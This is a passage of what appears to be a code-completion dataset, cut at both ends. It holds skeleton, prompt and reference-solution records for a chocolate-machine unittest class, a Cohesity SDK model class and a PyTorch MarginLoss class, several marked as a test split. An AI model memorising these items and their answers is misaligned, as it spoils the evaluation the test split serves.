stats functionality\n- def test_has_raw_materials(self): test has_raw_materials functionality\n- def test_has_raw_materials_handles_insufficient_raw_materials(self): test has_raw_materials handles insufficient raw materials functionality\n- def test_bake_chocolate_bar(self): test bake_chocolate_bar functionality\n\n<|skeleton|>\nclass TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n <|body_0|>\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n <|body_1|>\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n <|body_2|>\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials functionality\"\"\"\n <|body_3|>\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n<|end_body_0|>\n\n<|body_start_1|>\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_1|>\n\n<|body_start_2|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_2|>\n\n<|body_start_3|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_3|>\n\n<|body_start_4|>\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_4|>\n", "revision_id": "3ad0990ee100d0dcf7a69a6851ce84ba262a6f5e", "skeleton": "<|skeleton|>\nclass TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n <|body_0|>\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n <|body_1|>\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n <|body_2|>\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials functionality\"\"\"\n <|body_3|>\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials functionality\"\"\"\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n", "source": "the_stack_v2_python_sparse", "source_path": "Part_7_Unittest/p_0006_wonka_chocolate_machine/test_chocolate_machine.py", "source_repo": "mytechnotalent/Python-For-Kids", "split": "test", "star_events_count": 697} {"blob_id": "97bd263e9f45a68063c5314d25accb87c8f65687", "bodies": ["self.environment = environment\nself.leaves_count = leaves_count\nself.total_logical_size = total_logical_size", "if dictionary is None:\n return None\nenvironment = dictionary.get('environment')\nleaves_count = dictionary.get('leavesCount')\ntotal_logical_size = dictionary.get('totalLogicalSize')\nreturn cls(environment, leaves_count, total_logical_size)"], "bodies_text": "<|body_start_0|>\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys", "class_name": "AggregatedSubtreeInfo", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000495", "length_bytes": 5989, "license_type": "permissive", "methods": [{"docstring": "Constructor for the AggregatedSubtreeInfo class", "name": "__init__", "signature": "def __init__(self, environment=None, leaves_count=None, total_logical_size=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `AggregatedSubtreeInfo` described below.\n\nClass description:\nImplementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\n\nMethod signatures and docstrings:\n- def __init__(self, environment=None, leaves_count=None, total_logical_size=None): Constructor for the AggregatedSubtreeInfo class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `AggregatedSubtreeInfo` described below.\n\nClass description:\nImplementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\n\nMethod signatures and docstrings:\n- def __init__(self, environment=None, leaves_count=None, total_logical_size=None): Constructor for the AggregatedSubtreeInfo class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AggregatedSubtreeInfo:\n \"\"\"Implementation of the 'AggregatedSubtreeInfo' model. Aggregated information about a node subtree. Attributes: environment (EnvironmentAggregatedSubtreeInfoEnum): Specifies the environment such as 'kSQL' or 'kVMware', where the Protection Source exists. Supported environment types such as 'kView', 'kSQL', 'kVMware', etc. NOTE: 'kPuppeteer' refers to Cohesity's Remote Adapter. 'kVMware' indicates the VMware Protection Source environment. 'kHyperV' indicates the HyperV Protection Source environment. 'kSQL' indicates the SQL Protection Source environment. 'kView' indicates the View Protection Source environment. 'kPuppeteer' indicates the Cohesity's Remote Adapter. 'kPhysical' indicates the phys\"\"\"\n\n def __init__(self, environment=None, leaves_count=None, total_logical_size=None):\n \"\"\"Constructor for the AggregatedSubtreeInfo class\"\"\"\n self.environment = environment\n self.leaves_count = leaves_count\n self.total_logical_size = total_logical_size\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n environment = dictionary.get('environment')\n leaves_count = dictionary.get('leavesCount')\n total_logical_size = dictionary.get('totalLogicalSize')\n return cls(environment, leaves_count, total_logical_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/aggregated_subtree_info.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "39017c91fcb49dc9a62c590010bfd0dd887e318e", "bodies": ["super(MarginLoss, self).__init__()\nself.margin = margin\nself.n_classes = n_classes\nself.beta_constant = beta_constant\nself.beta_val = beta\nself.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\nself.nu = nu\nself.sampling_method = sampling_method\nself.sampler = TupleSampler(method=sampling_method)", "if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\nsampled_triplets = self.sampler.give(batch, labels)\nd_ap, d_an = ([], [])\nfor triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\nd_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\nif self.beta_constant:\n beta = self.beta\nelse:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\npos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\nneg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\npair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\nloss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\nif self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\nreturn loss"], "bodies_text": "<|body_start_0|>\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MarginLoss", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MarginLoss:\n\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\"\"\"\n <|body_0|>\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000496", "length_bytes": 29027, "license_type": "no_license", "methods": [{"docstring": "Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!", "name": "__init__", "signature": "def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance')"}, {"docstring": "Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)", "name": "forward", "signature": "def forward(self, batch, labels)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006560", "prompt": "Implement the Python class `MarginLoss` described below.\n\nClass description:\nImplement the MarginLoss class.\n\nMethod signatures and docstrings:\n- def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'): Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\n- def forward(self, batch, labels): Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)", "prompted_full_text": "Implement the Python class `MarginLoss` described below.\n\nClass description:\nImplement the MarginLoss class.\n\nMethod signatures and docstrings:\n- def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'): Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\n- def forward(self, batch, labels): Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\n\n<|skeleton|>\nclass MarginLoss:\n\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\"\"\"\n <|body_0|>\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MarginLoss, self).__init__()\n self.margin = margin\n self.n_classes = n_classes\n self.beta_constant = beta_constant\n self.beta_val = beta\n self.beta = beta if beta_constant else torch.nn.Parameter(torch.ones(n_classes) * beta)\n self.nu = nu\n self.sampling_method = sampling_method\n self.sampler = TupleSampler(method=sampling_method)\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(labels, torch.Tensor):\n labels = labels.detach().cpu().numpy()\n sampled_triplets = self.sampler.give(batch, labels)\n d_ap, d_an = ([], [])\n for triplet in sampled_triplets:\n train_triplet = {'Anchor': batch[triplet[0], :], 'Positive': batch[triplet[1], :], 'Negative': batch[triplet[2]]}\n pos_dist = ((train_triplet['Anchor'] - train_triplet['Positive']).pow(2).sum() + 1e-08).pow(1 / 2)\n neg_dist = ((train_triplet['Anchor'] - train_triplet['Negative']).pow(2).sum() + 1e-08).pow(1 / 2)\n d_ap.append(pos_dist)\n d_an.append(neg_dist)\n d_ap, d_an = (torch.stack(d_ap), torch.stack(d_an))\n if self.beta_constant:\n beta = self.beta\n else:\n beta = torch.stack([self.beta[labels[triplet[0]]] for triplet in sampled_triplets]).type(torch.FloatTensor)\n pos_loss = torch.nn.functional.relu(d_ap - beta + self.margin)\n neg_loss = torch.nn.functional.relu(beta - d_an + self.margin)\n pair_count = torch.sum((pos_loss > 0.0) + (neg_loss > 0.0)).type(torch.FloatTensor)\n loss = torch.sum(pos_loss + neg_loss) if pair_count == 0.0 else torch.sum(pos_loss + neg_loss) / pair_count\n if self.nu:\n loss = loss + beta_regularisation_loss.type(torch.FloatTensor)\n return loss\n<|end_body_1|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass MarginLoss:\n\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, sampling_method='distance'):\n \"\"\"Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'. Args: margin: float, fixed triplet margin (see also TripletLoss). nu: float, regularisation weight for beta. Zero by default (in literature as well). beta: float, initial value for trainable class margins. Set to default literature value. n_classes: int, number of target class. Required because it dictates the number of trainable class margins. beta_constant: bool, set to True if betas should not be trained. sampling_method: str, sampling method to use to generate training triplets. Returns: Nothing!\"\"\"\n <|body_0|>\n\n def forward(self, batch, labels):\n \"\"\"Args: batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1] Returns: margin loss (torch.Tensor(), batch-averaged)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MarginLoss:\n def __init__(self, margin=0.2, nu=0, beta=1.2, n_classes=100, beta_constant=False, 